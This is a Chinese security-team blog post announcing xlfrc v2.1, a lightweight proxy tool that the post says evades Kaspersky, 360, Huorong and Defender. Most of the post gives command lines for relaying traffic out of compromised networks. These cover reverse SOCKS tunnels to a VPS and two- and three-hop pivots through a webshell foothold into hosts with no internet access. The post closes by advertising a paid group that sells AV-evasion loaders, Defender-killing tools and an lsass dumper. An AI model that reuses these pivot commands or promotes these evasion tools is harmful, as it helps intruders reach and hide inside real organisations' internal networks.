文章总结： xlfrcv2.1是一款基于C语言重构的跨平台代理工具，体积仅1MB，支持多层正反向代理及Socks5认证。该工具针对FRP进行了轻量化改造，具备绕过卡巴斯基、360、火绒及Defender的免杀能力。文章详细演示了其在复杂内网环境下的配置与使用方法，适合红队作业与内网渗透场景。 综合评分： 75 文章分类： 免杀,红队,内网渗透,安全工具,产品介绍

C语言构建 | 替代frp 过卡巴斯基、360、火绒、defender的xlfrc v2.1发布！

原创

星落 星落

星落安全团队

2026年1月30日 00:01 黑龙江

点击上方蓝字关注我们

现在只对常读和星标的公众号才展示大图推送，建议大家能把星落安全团队“设为星标”，否则可能就看不到了啦！

工具介绍

XLFRC经过 10个版本的迭代，从基于 FRP 的二次开发（改用命令行参数替代配置文件、分离客户端与服务端代码）演进到 2.0版本彻底重构为基于 EW (anhilo师傅)代码，通过 C 语言重写实现跨平台支持（Windows/Linux）、多层反向代理（2-3 层）和正向代理功能，最终将体积压缩至 1MB，较 FRP 的 8MB 显著缩减，同时提升了文件传输稳定性。获取方式：连同星落安全工具箱1.2、cobaltstrike2.0.1星落专版、免杀加载器以及其他发布的工具都放在了内部纷传里。

初期版本 (v1.0-v1.8)

• 基于FRP框架二次开发

• 突破性改进：

• 采用命令行参数替代config.ini配置

• 实现客户端/服务端代码分离

• 随机socks密码、端口等信息

革命性重构 (v1.9-v2.0)

• 转向基于EW代码二次开发

• linux采用静态编译，提高系统兼容性，解决缺少动态库问题！

• windows继续使用1.9版本，目前仍保持良好的免杀效果

• 关键技术改进：

• C语言重构，体积大幅缩减：

• 实现多层反向代理(2-3层)

• 新增正向代理支持

• 完全分离Windows/Linux代码

• 支持全平台部署

• Windows/Linux版：1MB。相较FRP 8MB体积，提升文件上传效率。

转发协议重构 (v2.1)

完全重构原有的EW老版本协议，采用新版本协议 支持Socks5协议账户密码认证方式，会更加安全！

新版本差异

技术指标对比：

| 特性 | FRP | XFLRC | | — | — | — | | 体积(Win/Linux) | ~8MB | ~1MB | | 代理层级 | 单层 | 2-3层 | | 代理模式 | 反向 | 正反向 | | 配置方式 | 文件 | 命令行 |

该重构使XLFRC在轻量化、灵活性和功能性方面均显著超越原FRP框架，特别适合资源受限环境和复杂网络拓扑场景。

使用方法

1. 正向 SOCKS 5代理。适用于目标具备公网IP地址，且端口对外开放。 命令行参数 -u / -p   如果使用的话就是支持账户密码认证形式，默认不使用的话就是无密码认证方式。

2. 反向 SOCKS 5代理。适用于目标不具备公网IP地址，需要我们在VPS上运行xlfrc服务模式。命令行参数 -u / -p   如果使用的话就是支持账户密码认证形式，默认不使用的话就是无密码

VPS服务端命令

xlfrc64.exe -s rcsocks -l 1080 -e 8888

内网机器客户端命令

xlfrc64.exe -s rssocks -d 1.1.1.1 -e 8888

3.二级网络环境

主机A：无公网IP，可以访问外网，可以访问部分内网web资源

主机B：只能全部内网资源，不出网

目前已经通过文件上传漏洞，上传webshell，成功解析，但是无法直接通过哥斯拉连接。这个时候需要我们把B的流量代理出来。

1. 在vps上启动socks端口转发模式。即在公网代理机器中添加转接隧道，将1080端口收到的代理请求转发给8080端口

xlfrc64.exe -s lcx_listen -l 1080 -e 8080

2.然后在主机B上启动socks服务模式，侦听9090端口

xlfrc64.exe -s ssocksd -l 9090

3.然后在主机A执行端口转发模式，即将主机A的8080端口和B主机的9090端口绑定。

xlfrc64.exe -s lcx_slave -d VPS的ip地址 -e 8080 -f 主机B -g 9090

4.三级网络环境

VPS: 192.168.31.22

主机A：无公网IP，可以连通外网 是web服务器(192.168.6.134)

主机B：只能访问内网资源，无法连通外网，只能被A访问(192.168.6.130)

主机C：可以被B访问并能访问核心业务 只能被B访问(10.10.10.12)

1. 在VPS公网执行，将1080端口收到的代理请求转发到8080端口：

xlfrc64.exe -s rcsocks -l 1080 -e 8080

2. 在主机A上将VPS的8080端口与主机B的9090端口连接起来：

xlfrc64.exe -s lcx_slave -d 192.168.31.22 -e 8080 -f 192.168.6.130 -g 9090

3. 在B主机上将9090端口收到的代理请求转发到7070端口：

xlfrc64.exe -s lcx_listen -l 9090 -e 7070

4. 在主机C上启动SOCKS5服务并反弹到7070端口

xlfrc64.exe -s rssocks -d 192.168.6.130 -e 7070

免杀效果

卡巴斯基

360安全卫士

火绒

defender

相关地址

关注微信公众号后台回复“入群”，即可进入星落安全交流群！

圈子介绍

博主介绍：

目前工作在某安全公司攻防实验室，一线攻击队选手。自2022-2024年总计参加过30+次省/市级攻防演练，擅长工具开发、免杀、代码审计、信息收集、内网渗透等安全技术。

目前已经更新的免杀内容：

• 部分免杀项目源代码

• 星落安全内部免杀工具箱1.0

• CobaltStrike4.9.1星落专版1.9

• 一键击溃windows defender

• 一键击溃火绒进程

• CobaltStrike免杀加载器

• 数据库直连工具免杀版

• aspx文件自动上线cobaltbrike

• jsp文件自动上线cobaltbrike

• 哥斯拉免杀工具 XlByPassGodzilla

• 冰蝎免杀工具 XlByPassBehinder

• 冰蝎星落专版 xlbehinder

• 正向代理工具 xleoreg

• 反向代理工具xlfrc

• 内网扫描工具 xlscan

• Todesk/向日葵密码读取工具

• 导出lsass内存工具 xlrls

• 绕过WAF免杀工具 ByPassWAF

• 等等…

目前星球已满1000人，价格由208元调整为218元(交个朋友啦)，1100名以后涨价至268元。

往期推荐

1.加量不加价 | 星落免杀第二期，助你打造专属免杀武器库

2.【干货】你不得不学习的内网渗透手法

3.新增全新Web UI版本，操作与管理全面升级 | GoCobalt Strike 2.0正式发布！

4.【免杀】原来SQL注入也可以绕过杀软执行shellcode上线CoblatStrike

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：星落安全团队 星落 星落《C语言构建 | 替代frp 过卡巴斯基、360、火绒、defender的xlfrc v2.1发布！》